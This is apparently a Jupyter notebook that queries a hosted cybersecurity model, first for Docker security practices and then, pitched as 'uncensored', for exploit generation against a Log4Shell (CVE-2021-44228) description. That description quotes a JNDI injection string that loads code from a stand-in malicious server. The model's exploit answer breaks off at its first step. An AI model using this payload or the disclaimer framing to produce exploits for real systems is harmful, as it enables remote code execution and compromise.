# Setup & Utils

In [None]:
import requests

In [None]:
import re

def extract_model_response(text: str) -> str:
    """
    Extracts the content between <think> and the final <|eot_id|> marker.

    Parameters:
        text (str): The full text containing <think> and <|eot_id|> markers.

    Returns:
        str: The extracted content between <think> and <|eot_id|>, or an empty string if not found.
    """
    match = re.search(r"<think>(.*?)<\|eot_id\|>", text, re.DOTALL)
    return match.group(1).strip() if match else ""


**Please enter the API key that was provided to you**

In [None]:
API_KEY = ""

# Chat/Q&A with Cybersecurity Reasoning Model

In [None]:
user_prompt = """
What are best practices for security when deploying a multi-container Docker architecture?
"""

In [None]:
resp = requests.post(
    "https://model-8w6j1ojq.api.baseten.co/development/predict",
    headers={"Authorization": f"Api-Key {API_KEY}"},
    json={'prompt': user_prompt},
)


In [None]:
model_response = extract_model_response(resp.text)

In [None]:
print(model_response)

When deploying a multi-container Docker architecture, the following best practices can be employed to enhance security:

1.  **Use Docker Content Trust (DCT)**: DCT enables secure delivery of images by verifying their authenticity and integrity using digital signatures.
2.  **Implement Role-Based Access Control (RBAC)**: Use tools like Docker's built-in RBAC or third-party solutions to restrict access to containers based on user roles and permissions.
3.  **Utilize Docker Secrets**: Store sensitive data such as passwords and API keys securely using Docker Secrets, which encrypts them at rest and in transit.
4.  **Enable Docker Network Segmentation**: Isolate containers into separate networks to prevent lateral movement in case of a breach. This can be achieved using Docker Networks or CNI plugins.
5.  **Monitor Container Activity**: Leverage tools like Docker's built-in logging and monitoring features, or third-party solutions like Prometheus and Grafana, to detect anomalies and suspic

# Use Case - Exploit Generation

**Use Case Description** - Move beyond just identifying exposed assets or CVEs — leverage a powerful uncensored AI model to simulate how each vulnerability in the attack surface could realistically be exploited. This isn't just ASM, it's ASM + Exploit Generation, where the model takes in asset info and vulnerability metadata, and outputs actual attack paths or even exploit code (in safe/internal environments).

## Exploit Analysis Utilities

In [None]:
def create_exploit_generation_prompt(vuln_description):
    """Create a prompt to generate a vulnerability summary and test exploit."""
    return f"""
You are a security researcher. Analyze the following vulnerability report and generate:

1. A concise summary of the issue.
2. Potential impact and affected components.
3. A safe, hypothetical proof-of-concept exploit (for testing only).

## VULNERABILITY DESCRIPTION
{vuln_description}

Ensure the response is for red team / security testing only — no real-world systems or harm implied.
"""

In [None]:
def run_exploit_analysis(vuln_description):
    """Send vulnerability description to model and return exploit suggestion."""
    prompt = create_exploit_generation_prompt(vuln_description)

    resp = requests.post(
        "https://model-8w6j1ojq.api.baseten.co/development/predict",
        headers={"Authorization": f"Api-Key {API_KEY}"},
        json={"prompt": prompt},
    )
    return extract_model_response(resp.text)

## Example Usage

In [None]:
sample_vuln = """
CVE-2021-44228: Log4Shell Remote Code Execution in Apache Log4j

Description:
A critical remote code execution vulnerability exists in Apache Log4j versions 2.0 to 2.14.1. This flaw allows a remote attacker to execute arbitrary code on the affected system by sending specifically crafted JNDI (Java Naming and Directory Interface) lookup strings through various input vectors. The vulnerability occurs because Log4j evaluates JNDI expressions that can load malicious code from remote servers. Successful exploitation could lead to complete system compromise including data theft, lateral movement within networks, and installation of malware or ransomware.

Triggering Mechanism:
The vulnerability is triggered when Log4j logs a string containing a specific format like "${jndi:ldap://malicious-server/payload}". When this string is processed, Log4j evaluates the JNDI lookup, which can connect to an attacker-controlled LDAP server and load malicious Java code. This can be triggered through various vectors including:
- HTTP headers
- User-agent strings
- Input form fields
- Any other data that might be logged

Affected Software:
- Apache Log4j versions 2.0 to 2.14.1
- Thousands of applications and services using vulnerable Log4j versions including:
  - Apache Struts
  - Apache Solr
  - Apache Druid
  - Elasticsearch
  - Apache Kafka
  - Minecraft servers
  - VMware Horizon
  - Many commercial enterprise products and cloud services

References:
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- CISA Advisory: https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a
- Apache Log4j Security Vulnerabilities: https://logging.apache.org/log4j/2.x/security.html
"""


In [None]:
output = run_exploit_analysis(sample_vuln)

In [None]:
print(output)

**Summary:** The Log4Shell vulnerability (CVE-2021-44228) affects Apache Log4j versions 2.0 to 2.14.1, allowing remote attackers to execute arbitrary code via crafted JNDI lookups in log messages. This can be exploited through various input vectors, leading to potential system compromise.

**Potential Impact and Affected Components:**

* **Impact:** Complete system compromise, including data theft, lateral movement, and malware/ransomware installation.
* **Affected Components:**
	+ Apache Log4j versions 2.0 to 2.14.1.
	+ Applications/services using vulnerable Log4j versions, such as:
		- Apache Struts
		- Apache Solr
		- Apache Druid
		- Elasticsearch
		- Apache Kafka
		- Minecraft servers
		- VMware Horizon
		- Commercial enterprise products/cloud services.

**Safe Proof-of-Concept Exploit (for testing only):**

To demonstrate the vulnerability without causing harm, we'll create a controlled environment. Please note that this POC should not be executed on production systems.

**Step 1